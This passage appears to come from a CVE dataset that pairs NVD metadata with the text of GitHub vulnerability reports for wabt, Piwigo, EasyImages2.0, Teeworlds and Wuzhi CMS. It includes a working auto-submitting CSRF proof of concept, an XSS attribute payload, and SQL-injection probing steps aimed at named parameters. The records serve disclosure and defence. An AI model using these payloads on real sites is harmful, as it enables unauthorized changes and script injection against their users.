"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/wabt/issues/2165"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OSFFCKXUQ5PAC5UVXY7N6HEHVQ3AC2RG/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/WebAssembly/wabt/issues/2165"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OSFFCKXUQ5PAC5UVXY7N6HEHVQ3AC2RG/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webassembly:webassembly_binary_toolkit:1.0.32:*:*:*:*:*:*:*",
"matchCriteriaId": "AFE1D9C5-6B44-494E-9964-8B5A1374C154",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"116"
] | 116 | https://github.com/WebAssembly/wabt/issues/2165 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"WebAssembly",
"wabt"
] | ### Describe the bug
'@' before a quote (") causes a libc++abi.dylib crash while converting ".wat" format into ".wasm" format using wat2wasm.
`wat2wasm --version`: 1.0.32 (git~1.0.32-35-g9990b0cf)
---------------
The following minimized code causes wat2wasm to crash.
```
(module (memory $mem 1)
;;(@_memory " (memory $mem)) ;; Space in between '@' and '"' avoids crash
;; A comment below the next line containing a '"' will also avoid a crash
(@_memory" (memory $mem))
(func
$main
(export "_main")
(result i32)
i32.const 21))
```
Absolute minimum example:
```
(@"
```
---------------
### Steps to reproduce:
Here are the test files: (Remove ".txt" and save them ".wat" files)
[wabt_crash.wat.txt](https://github.com/WebAssembly/wabt/files/10936843/wabt_crash.wat.txt)
[wabt_crash_min.wat.txt](https://github.com/WebAssembly/wabt/files/10936844/wabt_crash_min.wat.txt)
* Install and build WABT
* Run wat2wasm on the test file: `wat2wasm wabt_crash.wat` and `wat2wasm wabt_crash_min.wat`
* Observe the crash:
```
libc++abi.dylib: terminating with uncaught exception of type std::length_error: basic_string
[1] 4522 abort wat2wasm wabt_crash.wat
```
---------------
### Expected Behavior:
Expected output should be an error (like the one below) produced by ` wat2wasm` instead of a crash.
For example, if the test file replaces the '@' with a '*', `wat2wasm` gives the expected error below when run with `wat2wasm expected.wat`, which points out the missing end quote.
```
expected.wat:4:29: error: newline in string
(*_memory" (memory $mem))
^
expected.wat:5:9: error: newline in string
(func
^
expected.wat:6:10: error: newline in string
$main
^
expected.wat:7:21: error: newline in string
(export "_main")
^
expected.wat:8:17: error: newline in string
(result i32)
^
expected.wat:9:19: error: newline in string
i32.const 21))
^
expected.wat:4:4: error: unexpected token (, expected ).
(*_memory" (memory $mem))
```
---------------------
### Additional information
A combination of afl-fuzz++4.03a and Wasmlike, an Xsmith-based random program generator produced the snippet of code that caused the crash. https://www.flux.utah.edu/project/xsmith
--------------- | '@' before a quote (") causes a libc++abi.dylib crash using wat2wasm. | https://api.github.com/repos/WebAssembly/wabt/issues/2165/comments | 2 | 2023-03-09T23:07:30Z | 2023-06-17T09:47:53Z | https://github.com/WebAssembly/wabt/issues/2165 | 1,618,118,032 | 2,165 | 5,171 |
CVE-2023-33359 | 2023-05-23T14:15:09.813 | Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1908"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1908"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/Piwigo/Piwigo/issues/1908 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Piwigo",
"Piwigo"
] | This vulnerability lies in the 'add tags' function in the backend.

Try creating a new label here.

Use burpsuite to intercept this request.

You can see that CSRF-Token does not exist here,So we can generate a CSRF POC.

Execute this poc,note that there are no tags here at this time


After executing the POC, it was found that there were new tags added


//CSRF POC:
`<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/piwigo/ws.php?format=json&method=pwg.tags.add" method="POST">
<input type="hidden" name="name" value="test" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
`
Of course, only one CSRF vulnerability is not serious. Next, I will demonstrate the possibility of combining it with XSS vulnerabilities for exploitation
| There is a CSRF vulnerability in the "add tags" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1908/comments | 3 | 2023-05-01T04:58:37Z | 2023-05-05T08:07:10Z | https://github.com/Piwigo/Piwigo/issues/1908 | 1,690,372,075 | 1,908 | 5,172 |
CVE-2023-33361 | 2023-05-23T14:15:09.863 | Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1910"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:-:*:*:*:*:*:*",
"matchCriteriaId": "C0F29243-1953-4593-9D93-65BAF0D5D0EB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Piwigo/Piwigo/issues/1910 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"Piwigo",
"Piwigo"
] | Before replicating this vulnerability, you need to first create a new album and access the "photos_add" function, and choose to create a new album

//like this

Then,accessing permalinks functionality

click this

Select the album you just created and use 'burp' to intercept this request

You can see this' cat_id 'parameter, which is where SQL injection exists

We are trying to add a single quotation mark to trigger an error in MySQL

We can also directly try using the sleep () function to trigger a delay

It is not difficult to find that there is an SQL injection here. Next, we will analyze this problem from the code level.
The vulnerability arises from '/admin/permalinks.php'
//Start Here

In our data package, we passed in the "set_permalink" and “cat_ Id"parameter, and "cat_id"is greater than 0, so we can enter this if branch

Then, because we passed in the 'permalink' parameter, we actually entered the internal else branch

Then we try to analyze the set_cat_permalink() function.(In /admin/include/functions_permalinks.php)

In the end, we can find this SQL statement, where '$cat_id' is passed directly into the SQL statement without any filtering.It is precisely this location that caused SQL injection

This vulnerability exists in version 13.6.0, and it is uncertain whether this issue exists in earlier versions
| There is a SQL Injection in the "permalinks" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1910/comments | 0 | 2023-05-03T06:02:27Z | 2023-05-05T08:24:43Z | https://github.com/Piwigo/Piwigo/issues/1910 | 1,693,458,747 | 1,910 | 5,173 |
CVE-2023-33362 | 2023-05-23T14:15:09.917 | Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1911"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1911"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Piwigo/Piwigo/issues/1911 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"Piwigo",
"Piwigo"
] | Accessing the 'profile' page

Add the 'user_id' parameter with single quotes

Discovering an error in MySQL can actually prove the existence of SQL injection, but we can still try using the sleep() function for testing


//Try to analyze how this vulnerability was generated from a code level perspective.

First find '/admin/profile.php'

Track build_user() function (in the /Piwigo/include/functions_user.inc.php)

The '$user_id' enters the getuserdata() function, so continue tracking getuserdata()

Finally, the '$user_id' variable will enter this string of SQL statements, which clearly does not filter the incoming parameter values, resulting in SQL injection

This vulnerability affects the latest version up to 13.6.0, and it is uncertain whether other versions will be affected. | There is a SQL Injection in the "profile" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1911/comments | 0 | 2023-05-04T12:22:34Z | 2023-05-05T08:25:03Z | https://github.com/Piwigo/Piwigo/issues/1911 | 1,695,904,246 | 1,911 | 5,174 |
CVE-2023-33599 | 2023-05-23T15:15:09.343 | EasyImages2.0 ≤ 2.8.1 is vulnerable to Cross Site Scripting (XSS) via viewlog.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/icret/EasyImages2.0/issues/115"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/icret/EasyImages2.0/issues/115"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:easyimages2.0_project:easyimages2.0:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7726676D-5277-4B11-80A3-E05703A11242",
"versionEndExcluding": "2.8.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/icret/EasyImages2.0/issues/115 | [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"icret",
"EasyImages2.0"
] | # EasyImages2.0 Cross-site scripting(xss) vulnerability
## Impact version
EasyImages2.0 ≤ 2.8.1
## Analysis Report
#### Vulnerability file
/app/viewlog.php
When displaying logs, the file directly outputs the log content to the front-end page without taking any preventive measures
#### Vulnerability exploitation
1.Use the JS script for the `user` parameter on the login page


2.The malicious code is triggered when the admin user views the login log

## Fixes
Filter special characters when displaying logs | EasyImages2.0 Cross-site scripting(xss) vulnerability | https://api.github.com/repos/icret/EasyImages2.0/issues/115/comments | 1 | 2023-05-11T06:54:28Z | 2023-05-13T16:50:28Z | https://github.com/icret/EasyImages2.0/issues/115 | 1,705,186,404 | 115 | 5,175 |
CVE-2023-31518 | 2023-05-23T20:15:09.947 | A heap use-after-free in the component CDataFileReader::GetItem of teeworlds v0.7.5 allows attackers to cause a Denial of Service (DoS) via a crafted map file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/manba-bryant/9ca95d69c65f4d2c55946932c946fb9b"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/teeworlds/teeworlds/issues/2970"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://mmmds.pl/fuzzing-map-parser-part-1-teeworlds/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/manba-bryant/9ca95d69c65f4d2c55946932c946fb9b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/teeworlds/teeworlds/issues/2970"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://mmmds.pl/fuzzing-map-parser-part-1-teeworlds/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:teeworlds:teeworlds:0.7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "C8D5BD38-F074-48E6-89FF-64FB9BAD3B3C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/teeworlds/teeworlds/issues/2970 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"teeworlds",
"teeworlds"
] | The client crashes (only with ASAN) when an invalid map ([3.map.zip](https://github.com/teeworlds/teeworlds/files/7402684/3.map.zip)) is loaded. Such a map can be delivered to the client by a malicious server.
Tested on Ubuntu 20.04 x86_64, Teeworlds version: [f35da54b6f2c5f9fd4bbd4559f887ccf8f8cc526](https://github.com/teeworlds/teeworlds/commit/f35da54b6f2c5f9fd4bbd4559f887ccf8f8cc526)
Compilation with ASAN:
```
export CXXFLAGS="-ggdb -O0 -fsanitize=address -fno-omit-frame-pointer"
export CFLAGS="-ggdb -O0 -fsanitize=address -fno-omit-frame-pointer"
cmake ..
make
```
Run and connect to a server that delivers an invalid map:
```
./teeworlds "connect 127.0.0.1" "gfx_fullscreen 0" "gfx_screen_height 240" "gfx_screen_width 360"
[...]
=================================================================
==31394==ERROR: AddressSanitizer: heap-use-after-free on address 0x61f00012e6e4 at pc 0x5555559764d5 bp 0x7ffffffd8c30 sp 0x7ffffffd8c20
READ of size 4 at 0x61f00012e6e4 thread T0
#0 0x5555559764d4 in CDataFileReader::GetItem(int, int*, int*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/shared/datafile.cpp:406
#1 0x5555559764d4 in CDataFileReader::FindItem(int, int) /home/osboxes/teeworlds/teeworlds-asan/src/engine/shared/datafile.cpp:438
#2 0x555555995f73 in CMap::Load(char const*, IStorage*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/shared/map.cpp:37
#3 0x5555555f0c6f in CClient::LoadMap(char const*, char const*, SHA256_DIGEST const*, unsigned int) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:807
#4 0x5555555f8408 in CClient::ProcessServerPacket(CNetChunk*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1251
#5 0x5555555f997e in CClient::PumpNetwork() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1596
#6 0x5555555f9d46 in CClient::Update() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1766
#7 0x5555555fc9a0 in CClient::Run() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2108
#8 0x5555555d24e5 in main /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2704
#9 0x7ffff68e10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#10 0x5555555dc48d in _start (/home/osboxes/teeworlds/teeworlds-asan/build/teeworlds+0x8848d)
0x61f00012e6e4 is located 2148 bytes inside of 3072-byte region [0x61f00012de80,0x61f00012ea80)
freed by thread T2 here:
#0 0x7ffff76918df in operator delete(void*) (/lib/x86_64-linux-gnu/libasan.so.5+0x1108df)
#1 0x7fffebe0f000 (/lib/x86_64-linux-gnu/libLLVM-10.so.1+0x1423000)
previously allocated by thread T2 here:
#0 0x7ffff7690947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947)
#1 0x7fffebe11b41 (/lib/x86_64-linux-gnu/libLLVM-10.so.1+0x1425b41)
Thread T2 created by T0 here:
#0 0x7ffff75bb805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x5555559cc6f6 in thread_init /home/osboxes/teeworlds/teeworlds-asan/src/base/system.c:484
#2 0x5555555e224f in CGraphicsBackend_Threaded::StartProcessor(CGraphicsBackend_Threaded::ICommandProcessor*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/backend_sdl.cpp:56
#3 0x5555555e224f in CGraphicsBackend_SDL_OpenGL::Init(char const*, int*, int*, int*, int*, int*, int, int, int*, int*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/backend_sdl.cpp:735
#4 0x55555561719f in CGraphics_Threaded::IssueInit() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/graphics_threaded.cpp:753
#5 0x555555617316 in CGraphics_Threaded::InitWindow() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/graphics_threaded.cpp:760
#6 0x555555617dab in CGraphics_Threaded::Init() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/graphics_threaded.cpp:807
#7 0x5555555fb64d in CClient::Run() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1951
#8 0x5555555d24e5 in main /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2704
#9 0x7ffff68e10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-use-after-free /home/osboxes/teeworlds/teeworlds-asan/src/engine/shared/datafile.cpp:406 in CDataFileReader::GetItem(int, int*, int*)
Shadow bytes around the buggy address:
0x0c3e8001dc80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dc90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dcb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c3e8001dcd0: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
0x0c3e8001dce0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dcf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dd00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dd10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3e8001dd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==31394==ABORTING
```
Doesn't crash without ASAN. | Heap use after free (read) while loading map in CDataFileReader::GetItem, datafile.cpp:406 | https://api.github.com/repos/teeworlds/teeworlds/issues/2970/comments | 0 | 2021-10-23T10:25:51Z | 2021-11-28T09:06:51Z | https://github.com/teeworlds/teeworlds/issues/2970 | 1,034,134,339 | 2,970 | 5,176 |
CVE-2023-31860 | 2023-05-23T20:15:10.040 | Wuzhi CMS v3.1.2 has a storage type XSS vulnerability in the backend of the Five Finger CMS b2b system. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/wuzhicms/b2b/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/wuzhicms/b2b/issues/3"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/wuzhicms/b2b/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wuzhicms:wuzhi_cms:3.1.2:*:*:*:*:*:*:*",
"matchCriteriaId": "552B5653-A850-4D01-A659-253F424096DF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/wuzhicms/b2b/issues/3 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"wuzhicms",
"b2b"
] | Affected version: Wuzhi CMS v3.1.2
Github download address: https://github.com/wuzhicms/b2b
Usage tool: Burpsuite
Vulnerability recurrence process:
(1) Firstly, enter the website backend, click on the extension module, and then click on online payment, as shown in the following figure:

(2) Enable the Burpsuite agent, click Search to capture packets, as shown in the following figure:


(3) After the parameter: keyValue, enter payload: "OnMoUsEoVeR=prompt (1)// and release the data packet.

(4) At this point, it can be seen that an additional "" appears at the order number, which can trigger this vulnerability when the mouse is placed, as shown in the following figure:


| There is a storage type XSS vulnerability in the backend of the Five Finger CMS b2b system v3.1.2 | https://api.github.com/repos/wuzhicms/b2b/issues/3/comments | 0 | 2023-04-24T10:01:57Z | 2023-04-24T10:01:57Z | https://github.com/wuzhicms/b2b/issues/3 | 1,680,896,765 | 3 | 5,177 |
CVE-2021-25748 | 2023-05-24T17:15:09.253 | A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use a newline character to bypass the sanitization of the `spec.rules[].http.paths[].path` field of an Ingress object (in the `networking.k8s.io` or `extensions` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
